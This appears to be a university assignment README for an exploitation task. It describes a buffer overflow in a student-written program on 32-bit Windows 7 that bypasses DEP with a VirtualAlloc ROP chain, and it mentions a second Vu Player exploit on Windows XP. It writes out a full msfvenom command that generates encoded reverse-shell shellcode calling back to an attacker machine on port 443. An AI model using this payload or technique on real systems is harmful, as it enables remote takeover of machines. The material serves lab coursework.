// Settings

:doctype: article
:hyphens:
:icons: font
:lang: en
:listing-caption: Listing
:sectnums:
:source-highlighter: pygments
:xrefstyle: short

// Links

:url-win-7-sha1-values: https://answers.microsoft.com/en-us/windows/forum/windows_7-windows_install/how-to-obtain-a-windows-7-iso-file-to-create-an/59ef6586-f881-40b7-9070-e7950e057143
:url-win-7-x86: https://archive.org/details/Windows_7_Professional_SP1_x86.iso
:url-win-7-x64: https://archive.org/details/Windows_7_Professional_SP1_x64.iso

// Content

== Introduction

This repository contains the files for ZIET8042 Assessment 2, major exploitation task. The contents of the repository is listed in <<tab-layout>>.
This exploit has focussed on Windows Data Execution Prevention (DEP) Control and Windows 7, SP1, 32-bit. 

[#tab-layout]
[cols="<20%,<80%", options="header"]
.Directory layout for submission.
|===
| Directory| Contents

| `/app`
| Source code for a vulnerable application.

| `/exploit`
| Python scripts, demonstrating bypass techniques for at least one security control.

|===

Tasks:

. Perform a `git clone` of the repository.

. Replace the contents with your vulnerable application, and retain the folder structure as per <<tab-layout>>.

. Write a https://makefiletutorial.com/[Makefile], which will be used to compile your vulnerable application.

. Provide instructions on how to build, execute, and exploit the application in <<sec-application>> and <<sec-exploit>>.

. Indicate in your submission the operating system and CPU architecture where your application should be built, and is vulnerable.

Restrictions:

* Your vulnerable application should compile and execute within an x86 or AMD64/Intel64 virtual machine. It is recommended you target either the https://kali.org/get-kali/#kali-virtual-machines[Kali Linux] 2022.3 or Windows 7 Professional (SP1) operating system.

* Alternatively, if targeting another operating system. Include a https://www.vagrantup.com/docs/vagrantfile[Vagrantfile] and provisioning scripts to build the virtual machine.

* Use https://asciidoctor.org/[Asciidoctor], or https://www.markdownguide.org/getting-started/[Markdown], to document your submission.

Tips:

* If not familiar with https://asciidoctor.org/[Asciidoctor] the document editor https://asciidocfx.com/[AsciidocFX] can help ensure the formatting of the document is valid.

* For https://www.markdownguide.org/getting-started/[Markdown], the visual editor https://typora.io[typora] provides a similar capability.

* Windows 7 Professional (SP1) ISO images are available to download for a {url-win-7-x86}[32-bit] or {url-win-7-x64}[64-bit] CPU architecture. The SHA1 hash values of these ISO images have been verified against values posted {url-win-7-sha1-values}[here].

[#sec-application]
== Application

=== Dependencies

_List any third-party dependencies required to build the application here..._

=== Compiling

_List steps, and any assumptions, to build the application here..._

=== Execution
Steps to launch exploit:
1) Using Command Prompt, run the exploit file; python Exploit1-VirtAll.py    
2) This python script will create the necessary "original_file.txt" which is used for testing the program
3) For testing and observation of the exploit, open Immunity Debugger 
4) Run VulnerableProgram.exe
5) The program will use the original_file.txt as input into it's file copy process, and run a buffer overflow
6) The shell code in this exploit payload will create a TCP shell on Port 443, to the attacking Kali machine on 198.168.100.5 
7) The exploit is confirmed when a shell is established from the Win7 victim, to the Kali machine (this is not a consistent result)

[#sec-exploit]
== Exploit

=== Exploit 1    VulnerableProgram on Windows 7 32-bit, bypassing DEP

Bypasing Data Execution Prevention (DEP), the ROP chain has been crafted with with VirtualAlloc().
The ROP gadgets are searched from the !mona . 
The ROP and PUSHAD techniques are used to bypass Data Execution Protection (DEP).
The shell code is generated from kali 2023.3, msfvenom was used, and the output captured for the exploit file as buf. 

msfvenom -n 100 -p windows/shell_reverse_tcp -f python -a x86 --platform windows -b "\x00\x20\x0A\x0d\x1a" -e x86/shikata_ga_nai LHOST=192.168.100.05 LPORT=443 > reverse_tcp.sc

The shell code establishes a TCP shell to the attacking Kali machine on 198.168.100.5.


=== Exploit 2    Vu Player on Windows XP 32-bit, bypassing DEP
This has been added as a supplimentary exploit file. 
Bypasing DEP again, the ROP chain has been crafted with SetProcessDEPPolicy()
_As above, but for any additional bypassed security controls._
